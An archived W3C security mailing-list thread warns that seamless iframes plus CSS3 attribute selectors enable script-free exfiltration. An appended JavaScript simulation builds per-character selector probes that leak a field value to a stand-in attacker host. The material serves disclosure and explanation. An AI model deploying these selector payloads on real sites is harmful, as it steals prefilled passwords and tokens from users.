- From: Adam Barth <w3c@adambarth.com>
- Date: Sat, 5 Dec 2009 08:54:58 -0800
- To: sird@rckc.at
- Cc: public-web-security@w3.org
I see. The issue is that the attacker can inject CSS + iframes, but not script, into one page in an origin. Now with seamless+CSS3, the attacker can steal information from the entire origin. Very cool!

Adam

On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
> I sincerely understand why people want seamless iframes in HTML5.. I mean,
> I've been there.. but sometimes the better way to do something is not to do
> it.
>
> The perfect example is seamless iframes (defined in HTML5) and CSS3
> selectors.
>
> I have (together with David Lindsay and Gareth Heyes) expressed
> several times that we think this is a bad idea.
>
> We always receive the same answer, "seamless iframes are same-origin!", and
> believe me, I know.. but guess what? JavaScript is also same-origin.. and it
> also creates problems.
>
> What I see is that those awesome CSS3 selectors, such as:
>
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>
> create a new type of XSS attack: purely CSS-based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.
>
> I really hope people in here know that a cool feature is sometimes not such
> a good idea, and hopefully we can see how to resolve this issue..
>
> References:
> The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/
> Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/
> Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html
>
> Greetings!!
> -- Eduardo
> http://www.sirdarckcat.net/
Received on Saturday, 5 December 2009 16:56:05 UTC
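The attribute-selector leak quoted in the thread, worked through as an added example (this is not code from the original message, nor from any of the referenced presentations). The attacker injects one rule per candidate character; only the rule whose `[value^=...]` prefix matches the field's `value` attribute fires a background fetch, and the fetched URL tells the collector which character came next. The block simulates the browser side offline so it runs under Node without a DOM: the helper names (`buildProbeRules`, `simulateBrowserFetches`, `recoverAttribute`), the collector host `attacker.example`, the probe alphabet and the sample attribute value `s3cr3t` are all my own constructed assumptions. It also carries the attack through the full prefix-extension loop, which the single-rule example in the message only hints at.

```javascript
// Added example: simulation of CSS attribute-selector exfiltration.
// Not from the original thread; hostnames, helper names and data are constructed.

const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789'; // assumed probe alphabet
const COLLECTOR = '//attacker.example/leak';              // hypothetical attacker endpoint

// Escape a string for use inside a double-quoted CSS attribute value.
function cssQuote(s) {
  return '"' + s.replace(/["\\]/g, (ch) => '\\' + ch) + '"';
}

// Build one rule per candidate character. A rule matches only when the
// password field's value attribute starts with prefix+ch, and its
// background-image URL then reveals that character to the collector.
function buildProbeRules(prefix, alphabet = ALPHABET) {
  return alphabet.split('').map((ch) => {
    const guess = prefix + ch;
    return `input[type=password][value^=${cssQuote(guess)}]` +
      `{background:url("${COLLECTOR}?prefix=${encodeURIComponent(guess)}")}`;
  });
}

// Stand-in for the browser: apply the probe rules to an <input> whose value
// *attribute* is attrValue and return the URLs the browser would request.
// CSS sees only the attribute; text the user types updates the value
// property, not the attribute, so this leaks server-populated values
// (prefilled fields, hidden tokens), not live keystrokes.
function simulateBrowserFetches(rules, attrValue) {
  const fetched = [];
  for (const rule of rules) {
    const m = rule.match(/\[value\^="((?:[^"\\]|\\.)*)"\]\{background:url\("([^"]*)"\)\}/);
    if (!m) continue;
    const probe = m[1].replace(/\\(.)/g, '$1');
    // [attr^=val] matches when the attribute begins with val; an empty val matches nothing.
    if (probe.length > 0 && attrValue.startsWith(probe)) fetched.push(m[2]);
  }
  return fetched;
}

// The attacker's loop: inject probes for the known prefix, read the leaked
// character out of the collector hit, extend the prefix, repeat. Stops when
// no probe fires (end of the value, or a character outside the alphabet).
function recoverAttribute(attrValue, alphabet = ALPHABET, maxLen = 64) {
  let known = '';
  let rounds = 0;
  while (known.length < maxLen) {
    const hits = simulateBrowserFetches(buildProbeRules(known, alphabet), attrValue);
    if (hits.length === 0) break;
    rounds += 1;
    // searchParams.get() already percent-decodes the leaked prefix.
    known = new URL('https:' + hits[0]).searchParams.get('prefix');
  }
  return { value: known, rounds };
}

// Usage: recover a constructed sample value one character per injection round.
console.log(recoverAttribute('s3cr3t')); // { value: 's3cr3t', rounds: 6 }
```

Each round costs one CSS injection (or one load of the seamless frame) and one outbound request per matching prefix, which is why the thread treats seamless iframes plus CSS3 selectors as an origin-wide read primitive rather than a single-page nuisance. A character outside the probe alphabet stops the loop, so a real attacker widens the alphabet or falls back to `*=` substring probes.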